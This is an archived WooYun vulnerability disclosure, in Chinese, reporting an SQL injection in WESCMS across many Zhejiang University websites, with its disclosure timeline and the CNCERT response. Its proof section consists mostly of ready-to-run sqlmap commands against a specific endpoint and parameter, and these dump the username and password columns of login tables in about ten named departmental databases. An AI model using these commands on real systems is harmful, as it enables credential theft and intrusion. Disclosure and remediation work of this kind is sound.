浙江大学多个网站存在通用型SQL注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134886

漏洞标题：浙江大学多个网站存在通用型SQL注入漏洞

漏洞作者：慢慢

提交时间：2015-08-22 21:12

修复时间：2015-10-09 10:10

公开时间：2015-10-09 10:10

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-22：细节已通知厂商并且等待厂商处理中
2015-08-25： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-04：细节向核心白帽子及相关领域专家公开
2015-09-14：细节向普通白帽子公开
2015-09-24：细节向实习白帽子公开
2015-10-09：细节向公众公开

简要描述：

浙江大学多个网站使用不靠谱的CMS导致SQL注入。

详细说明：

浙江大学多个网站使用不靠谱的CMS导致SQL注入。

漏洞证明：

以浙江大学化学系为例详细说明：

sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dbs

得到结果

available databases [3]:
[*] chem
[*] information_schema
[*] test

选择chem继续深入

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" -D chem --tables

得出结果

Database: chem
[79 tables]
+-------------------------+
| adodbseq                |
| daoshi                  |
| daoshi_fufeipd          |
| daoshi_liushui          |
| member                  |
| member_group            |
| member_profile          |
| poll_config             |
| poll_log                |
| poll_option             |
| poll_poll               |
| sc_arrangement          |
| sc_config               |
| sc_datesector           |
| sc_rooms                |
| tbladvertisement        |
| tblarticle              |
| tblarticle_remark       |
| tblauditflow            |
| tblauditflow_status     |
| tblauditflow_step       |
| tblclass_template       |
| tblcolumns              |
| tblcounter              |
| tblcounter_daily        |
| tblcounter_online       |
| tblcp_class             |
| tblcp_class_field       |
| tblcp_class_relation    |
| tblcp_class_validator   |
| tblcp_constraint        |
| tblcp_constraint_bind   |
| tblcp_datatype          |
| tblcp_datatype_item     |
| tblcp_domain_validator  |
| tblcrons                |
| tblcustom_form          |
| tblcustom_form_bind     |
| tblcustom_form_cc       |
| tblcustom_form_field    |
| tblcustom_form_tab      |
| tblcustomise            |
| tbldashboard            |
| tbldashboard_plugins    |
| tbldistrictprivilege    |
| tblevent                |
| tblgroup                |
| tblguestbook            |
| tblkeywords             |
| tbllink                 |
| tbllogin                |
| tbllogs                 |
| tblobject_attachment    |
| tblobject_counter       |
| tblobject_keywords      |
| tblobject_note          |
| tblobject_propertysheet |
| tblpersistent           |
| tblprivilege            |
| tblprivilege_atoms      |
| tblproc                 |
| tblprofile_fields       |
| tblroom_arrangement     |
| tblroom_datesector      |
| tblroom_login_config    |
| tblroom_rooms           |
| tblseq_cp_class         |
| tblsoft                 |
| tblsubject              |
| tblsubjectarticle       |
| tbluser_preference      |
| tblusergroup            |
| yiqi_customfrom_bind    |
| yiqitimeset             |
| yiqiyy                  |
| yiqiyy_yuyueqrsj        |
| yiqiyy_yuyuesj          |
| youjianmb               |
| yuyue_revise_log        |
+-------------------------+

然后挑选tbllogin进行下一步

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" -T tbllogin -D chem --threads=10 --columns

得出结果

+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| address     | varchar(255) |
| birthday    | int(11)      |
| branch      | varchar(50)  |
| contact     | varchar(50)  |
| customize1  | varchar(255) |
| customize2  | varchar(255) |
| customize3  | varchar(255) |
| customize4  | varchar(255) |
| customize5  | varchar(255) |
| customize6  | text         |
| customize7  | text         |
| descri      | varchar(100) |
| duty        | varchar(200) |
| email       | varchar(50)  |
| gender      | int(11)      |
| id          | int(11)      |
| last_visit  | int(11)      |
| lock_flag   | int(11)      |
| mobile      | varchar(50)  |
| msn         | varchar(50)  |
| name        | varchar(50)  |
| password    | char(32)     |
| qq          | varchar(20)  |
| regdate     | int(11)      |
| tele        | varchar(50)  |
| unit        | varchar(50)  |
| user_type   | int(11)      |
| username    | varchar(50)  |
| visit_count | int(11)      |
| zip         | varchar(30)  |
+-------------+--------------+

然后最后一步

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D chem --threads=10

别人的密码就不写了，上一张截图证明：

浙江大学其他网站的漏洞证明：
1. 浙江大学本科生院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D bksy --threads=10

有很多123456

2. 浙江大学研究生院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D grs --threads=10

3. 浙江大学人事处

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D hr --threads=10

4. 浙江大学图书馆

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D libweb --threads=10

5. 浙江大学物理系

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D physics --threads=10

6. 浙江大学化学工程与生物学院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D che --threads=10

7. 浙江大学经济学院（没想到经济学院竟然是chem）

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D chem --threads=10

8. 浙江大学城市学院图书馆

python sqlmap.py -u "http://**.**.**.**//wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D lib --threads=10

9. 浙江大学生命科学研究院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D lsi --threads=10

10. 浙江大学电气工程学院

python sqlmap.py -u "http://**.**.**.**/wescms/sys/order_adjust.php" --data="id_f=id&order_f=qq&id=1*&dir=up&table=tbllogin" --dump -C id,username,password -T tbllogin -D ee --threads=10

同类型的SQL漏洞在浙江大学的网站中还存在着很多，几乎所有使用了WESCMS的网站都有这个漏洞。

修复方案：

尽量更换CMS，虽然不太可能……

版权声明：转载请注明来源慢慢@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-08-25 10:09

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向教育网应急组织赛尔网络公司通报.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134886

漏洞标题：浙江大学多个网站存在通用型SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者：慢慢

提交时间：2015-08-22 21:12

修复时间：2015-10-09 10:10

公开时间：2015-10-09 10:10

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源慢慢@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0134886

漏洞标题：浙江大学多个网站存在通用型SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： 慢慢

提交时间：2015-08-22 21:12

修复时间：2015-10-09 10:10

公开时间：2015-10-09 10:10

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0134886"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 慢慢@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：慢慢

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源慢慢@乌云